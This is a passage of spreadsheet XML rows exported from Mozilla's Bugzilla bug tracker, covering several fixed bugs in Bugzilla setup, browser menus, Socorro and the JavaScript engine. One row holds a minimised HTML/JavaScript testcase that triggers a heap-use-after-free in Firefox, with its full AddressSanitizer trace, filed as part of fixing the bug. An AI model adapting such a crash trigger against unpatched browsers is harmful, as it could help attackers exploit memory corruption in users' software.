      </c>
      <c r="K4724" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4724" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M4724" t="inlineStr">
        <is>
          <t>Mac System 8.5</t>
        </is>
      </c>
      <c r="N4724" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4724" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4724" t="inlineStr"/>
      <c r="Q4724" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4724" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4724" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T4724" t="n">
        <v>1</v>
      </c>
      <c r="U4724" t="n">
        <v>0</v>
      </c>
      <c r="V4724" t="n">
        <v>7</v>
      </c>
      <c r="W4724" t="inlineStr">
        <is>
          <t>Tried to install Bugzilla on a local machine here that hasn't had database stuff 
on it before, and got this as the *only* output when trying to run checksetup.pl:
Uncaught exception from user code:
        Uncaught exception from user code:
        Can't locate DBI.pm in @INC (@INC contains: /usr/lib/perl5/5.6.0/i386-
linux /usr/lib/perl5/5.6.0 /usr/lib/perl5/site_perl/5.6.0/i386-linux /usr/lib/
perl5/site_perl/5.6.0 /usr/lib/perl5/site_perl .) at ./checksetup.pl line 560.
        main::BEGIN() called at DBI.pm line 560
        require 0 called at DBI.pm line 560
BEGIN failed--compilation aborted at ./checksetup.pl line 560.
There is a "use DBI" statement directly above the MySQL version checking code, at 
the line number mentioned.  Commenting out that line solved the problem, since 
DBI is already loaded at that point due to the version checking looking for it 
earlier in the file.  With that line commented out, I got the usual version 
checks, and the paragraph stating that I needed to install things like you 
normally expect.  The version check for MySQL still succeeds (meaning DBI was 
indeed loaded) after DBI is installed.  Patch is forthcoming.</t>
        </is>
      </c>
      <c r="X4724" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4725">
      <c r="A4725" t="n">
        <v>24144</v>
      </c>
      <c r="B4725" t="inlineStr">
        <is>
          <t>2000-01-16 23:33:10 -0800</t>
        </is>
      </c>
      <c r="C4725" t="inlineStr">
        <is>
          <t>"File, New Window" is broken</t>
        </is>
      </c>
      <c r="D4725" t="inlineStr">
        <is>
          <t>2008-07-31 02:50:20 -0700</t>
        </is>
      </c>
      <c r="E4725" t="n">
        <v>1</v>
      </c>
      <c r="F4725" t="n">
        <v>1</v>
      </c>
      <c r="G4725" t="n">
        <v>3</v>
      </c>
      <c r="H4725" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4725" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4725" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K4725" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4725" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4725" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4725" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4725" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4725" t="inlineStr"/>
      <c r="Q4725" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4725" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4725" t="inlineStr">
        <is>
          <t>M13</t>
        </is>
      </c>
      <c r="T4725" t="n">
        <v>1</v>
      </c>
      <c r="U4725" t="n">
        <v>0</v>
      </c>
      <c r="V4725" t="n">
        <v>11</v>
      </c>
      <c r="W4725" t="inlineStr">
        <is>
          <t>To reproduce:
1. Choose "File, New Window" from the browser menu
Expected: new window opens
Actual: nothing happens
I suspect brutal sharing has been brutalized.</t>
        </is>
      </c>
      <c r="X4725" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4726">
      <c r="A4726" t="n">
        <v>631633</v>
      </c>
      <c r="B4726" t="inlineStr">
        <is>
          <t>2011-02-04 12:32:56 -0800</t>
        </is>
      </c>
      <c r="C4726" t="inlineStr">
        <is>
          <t>objc_msgSend no longer treated as a signature prefix</t>
        </is>
      </c>
      <c r="D4726" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E4726" t="n">
        <v>1</v>
      </c>
      <c r="F4726" t="n">
        <v>1</v>
      </c>
      <c r="G4726" t="n">
        <v>4</v>
      </c>
      <c r="H4726" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4726" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4726" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4726" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4726" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4726" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4726" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4726" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4726" t="inlineStr"/>
      <c r="Q4726" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4726" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4726" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4726" t="n">
        <v>1</v>
      </c>
      <c r="U4726" t="n">
        <v>0</v>
      </c>
      <c r="V4726" t="n">
        <v>10</v>
      </c>
      <c r="W4726" t="inlineStr">
        <is>
          <t>I noticed this morning that objc_msgSend is no longer being treated as a frame to be prefixed; this means that tons of distinct Mac crashes are going to be lumped together.
The first Camino crash I see exhibiting this problem is at 18:47 2-2, so something around that time probably broke this (Camino's lower volume, so I'd say ±2 hours).
I suspect it was bug 630230 that broke this, based on the timeframe and FIXED bugs.
I'm unsure how many other signatures that are supposed to be prefixed were broken at this same time; objc_msgSend jumped right out at me, though.</t>
        </is>
      </c>
      <c r="X4726" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4727">
      <c r="A4727" t="n">
        <v>1415541</v>
      </c>
      <c r="B4727" t="inlineStr">
        <is>
          <t>2017-11-08 05:36:49 -0800</t>
        </is>
      </c>
      <c r="C4727" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsXMLPrettyPrinter::PrettyPrint</t>
        </is>
      </c>
      <c r="D4727" t="inlineStr">
        <is>
          <t>2024-05-30 09:38:07 -0700</t>
        </is>
      </c>
      <c r="E4727" t="n">
        <v>1</v>
      </c>
      <c r="F4727" t="n">
        <v>1</v>
      </c>
      <c r="G4727" t="n">
        <v>3</v>
      </c>
      <c r="H4727" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4727" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4727" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4727" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L4727" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4727" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4727" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4727" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4727" t="inlineStr">
        <is>
          <t>[post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4727" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4727" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4727" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T4727" t="n">
        <v>1</v>
      </c>
      <c r="U4727" t="n">
        <v>0</v>
      </c>
      <c r="V4727" t="n">
        <v>24</v>
      </c>
      <c r="W4727" t="inlineStr">
        <is>
          <t>Created attachment 8926358
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox nightly.
crash.html:
&lt;script&gt;
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    try{x.send("X");}catch(e){}
}
function start() {
	o1=document.createElement('iframe');
    o1.src='data:text/xml,&lt;x/&gt;';
	o4=document;
	window.setTimeout("fun0()",10);
}
function fun0() {
	o150=document.documentElement.cloneNode(true);
	document.documentElement.appendChild(o150);
	o170=document.createElement('style');
	spin();
	o171=document.createTextNode("@import'/p/r'; { border-top-color} *{ scroll-snap-points-x: repeat(28rem");
	o170.appendChild(o171);
	o150.appendChild(o170);
	o4.write('&lt;html&gt;&lt;body&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;');
	window.top.document.documentElement.appendChild(o1);
	window.top.document.documentElement.appendChild(o170);
	window.setTimeout("location.reload()", 1000);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==24871==ERROR: AddressSanitizer: heap-use-after-free on address 0x622000042100 at pc 0x7f4c0d8215b6 bp 0x7ffd226c0d30 sp 0x7ffd226c0d28
READ of size 8 at 0x622000042100 thread T0 (file:// Content)
    #0 0x7f4c0d8215b5 in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*) /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:157:16
    #1 0x7f4c0d81f70f in nsXMLContentSink::MaybePrettyPrint() /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:214:17
    #2 0x7f4c0d822bd4 in nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:306:5
    #3 0x7f4c0d8231d3 in non-virtual thunk to nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:264:19
    #4 0x7f4c091ec6c5 in DidBuildModel /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:491:37
    #5 0x7f4c091ec6c5 in nsParser::ResumeParse(bool, bool, bool) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1101
    #6 0x7f4c091f242c in nsParser::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1475:10
    #7 0x7f4c0911aee6 in nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:357:15
    #8 0x7f4c076280c5 in nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:878:18
    #9 0x7f4c0762849f in non-virtual thunk to nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:864:16
    #10 0x7f4c076758e6 in nsInputStreamPump::OnStateStop() /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:704:20
    #11 0x7f4c07673cb6 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:428:25
    #12 0x7f4c07464d4d in nsInputStreamReadyEvent::Run() /builds/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:97:20
    #13 0x7f4c074a6ba1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #14 0x7f4c074cbbd6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #15 0x7f4c074e6098 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #16 0x7f4c082b8711 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #17 0x7f4c08218d6b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #18 0x7f4c08218d6b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #19 0x7f4c08218d6b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #20 0x7f4c0dc9f0ef in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #21 0x7f4c11fbb097 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #22 0x7f4c08218d6b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f4c08218d6b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f4c08218d6b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f4c11fbaa4a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #26 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #27 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #28 0x7f4c24c7382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #29 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)
0x622000042100 is located 0 bytes inside of 5768-byte region [0x622000042100,0x622000043788)
freed by thread T0 (file:// Content) here:
    #0 0x4bc0fb in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f4c0e404b5e in mozilla::PresShell::Release() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:840:1
    #2 0x7f4c0e50e8fb in assign_assuming_AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:355:7
    #3 0x7f4c0e50e8fb in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:631
    #4 0x7f4c0e50e8fb in nsDocumentViewer::DestroyPresShell() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:4645
    #5 0x7f4c0e505c24 in nsDocumentViewer::Hide() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2245:3
    #6 0x7f4c115993c9 in SetVisibility /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6612:9
    #7 0x7f4c115993c9 in non-virtual thunk to nsDocShell::SetVisibility(bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6602
    #8 0x7f4c0a38452a in nsFrameLoader::Hide() /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:1467:12
    #9 0x7f4c0e86cc90 in nsSubDocumentFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&amp;) /builds/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:1029:22
    #10 0x7f4c0e80209c in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&amp;, nsIFrame*, nsFrameList*, mozilla::layout::PostFrameDestroyData&amp;) /builds/worker/workspace/build/src/layout/generic/nsLineBox.cpp:402:14
    #11 0x7f4c0e62be27 in nsBlockFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&amp;) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:331:3
    #12 0x7f4c0e62c98d in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:59:12
    #13 0x7f4c0e62c98d in nsContainerFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&amp;) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:226
    #14 0x7f4c0e689669 in nsCanvasFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&amp;) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:160:21
    #15 0x7f4c0e62c98d in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:59:12
    #16 0x7f4c0e62c98d in nsContainerFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&amp;) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:226
    #17 0x7f4c0e51fde4 in nsIFrame::Destroy() /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:674:5
    #18 0x7f4c0e6a0ab2 in nsContainerFrame::RemoveFrame(mozilla::layout::FrameChildListID, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:174:16
    #19 0x7f4c0e4db818 in RemoveFrame /builds/worker/workspace/build/src/layout/base/nsFrameManager.cpp:535:18
    #20 0x7f4c0e4db818 in nsCSSFrameConstructor::ContentRemoved(nsIContent*, nsIContent*, nsIContent*, nsCSSFrameConstructor::RemoveFlags) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8827
    #21 0x7f4c0e4c77e4 in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, nsCSSFrameConstructor::InsertionKind) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10027:7
    #22 0x7f4c0e3f431a in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&amp;) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1513:25
    #23 0x7f4c0e469eba in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1159:9
    #24 0x7f4c0e428de0 in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1235:3
    #25 0x7f4c0e428de0 in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44
    #26 0x7f4c0e428de0 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4196
    #27 0x7f4c0a2edb10 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:572:5
    #28 0x7f4c0a2edb10 in nsDocument::FlushPendingNotifications(mozilla::FlushType, mozilla::FlushTarget) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8547
    #29 0x7f4c0e173447 in nsComputedDOMStyle::UpdateCurrentStyleSources(bool) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:946:13
    #30 0x7f4c0e174fb1 in nsComputedDOMStyle::GetPropertyCSSValue(nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:1160:3
    #31 0x7f4c0e172af8 in nsComputedDOMStyle::GetPropertyValue(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt;&amp;) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:479:26
    #32 0x7f4c0d81ffae in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*) /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:81:28
    #33 0x7f4c0d81f70f in nsXMLContentSink::MaybePrettyPrint() /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:214:17
    #34 0x7f4c0d822bd4 in nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:306:5
    #35 0x7f4c0d8231d3 in non-virtual thunk to nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:264:19
    #36 0x7f4c091ec6c5 in DidBuildModel /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:491:37
    #37 0x7f4c091ec6c5 in nsParser::ResumeParse(bool, bool, bool) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1101
    #38 0x7f4c091f242c in nsParser::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1475:10
    #39 0x7f4c0911aee6 in nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:357:15
previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7f4c0a2b9663 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7f4c0a2b9663 in nsDocument::CreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:4146
    #4 0x7f4c0e5015ef in nsDocumentViewer::InitPresentationStuff(bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:684:27
    #5 0x7f4c0e500ebf in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:942:10
    #6 0x7f4c0e500127 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:659:10
    #7 0x7f4c115a11db in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9558:7
    #8 0x7f4c1159fb9c in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7382:17
    #9 0x7f4c11538905 in nsDocShell::CreateContentViewer(nsTSubstring&lt;char&gt; const&amp;, nsIRequest*, nsIStreamListener**) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9365:3
    #10 0x7f4c11536210 in nsDSURIContentListener::DoContent(nsTSubstring&lt;char&gt; const&amp;, bool, nsIRequest*, nsIStreamListener**, bool*) /builds/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:196:21
    #11 0x7f4c0911b5ea in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:739:28
    #12 0x7f4c09118d93 in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:417:30
    #13 0x7f4c091177bb in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:295:8
    #14 0x7f4c076276d7 in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:859:25
    #15 0x7f4c07674592 in nsInputStreamPump::OnStateStart() /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:518:25
    #16 0x7f4c07673c1e in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:421:25
    #17 0x7f4c07464d4d in nsInputStreamReadyEvent::Run() /builds/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:97:20
    #18 0x7f4c074a6ba1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #19 0x7f4c074cbbd6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #20 0x7f4c074e6098 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #21 0x7f4c082b8711 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #22 0x7f4c08218d6b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f4c08218d6b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f4c08218d6b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f4c0dc9f0ef in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #26 0x7f4c11fbb097 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #27 0x7f4c08218d6b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #28 0x7f4c08218d6b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #29 0x7f4c08218d6b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #30 0x7f4c11fbaa4a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #31 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #32 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #33 0x7f4c24c7382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:157:16 in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*)
Shadow bytes around the buggy address:
  0x0c44800003d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c44800003e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c44800003f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4480000400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4480000410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c4480000420:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000430: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000440: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000450: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4480000460: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c448000047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4871==ABORTING</t>
        </is>
      </c>
      <c r="X4727" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4728">
      <c r="A4728" t="n">
        <v>436741</v>
      </c>
      <c r="B4728" t="inlineStr">
        <is>
          <t>2008-05-31 20:42:23 -0700</t>
        </is>
      </c>
      <c r="C4728" t="inlineStr">
        <is>
          <t>"Assertion failure: OBJ_IS_NATIVE(obj)" with __proto__ mangling</t>
        </is>
      </c>
      <c r="D4728" t="inlineStr">
        <is>
          <t>2009-05-07 14:58:59 -0700</t>
        </is>
      </c>
      <c r="E4728" t="n">
        <v>1</v>
      </c>
      <c r="F4728" t="n">
        <v>1</v>
      </c>
      <c r="G4728" t="n">
        <v>3</v>
      </c>
      <c r="H4728" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4728" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4728" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4728" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4728" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4728" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4728" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4728" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4728" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4728" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4728" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4728" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4728" t="n">
        <v>1</v>
      </c>
      <c r="U4728" t="n">
        <v>0</v>
      </c>
      <c r="V4728" t="n">
        <v>21</v>
      </c>
      <c r="W4728" t="inlineStr">
        <is>
          <t>Created attachment 323256
testcase (crashes or hangs Firefox when loaded)
Loading the testcase kills Firefox.
Debug:
Assertion failure: OBJ_IS_NATIVE(obj), at /Users/jruderman/central/mozilla/js/src/jslock.cpp:1187
Opt:
Hang.
Security-sensitive for now because I don't know whether this is a memory safety bug in opt builds.</t>
        </is>
      </c>
      <c r="X4728" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4729">
      <c r="A4729" t="n">
        <v>558054</v>
      </c>
      <c r="B4729" t="inlineStr">
        <is>
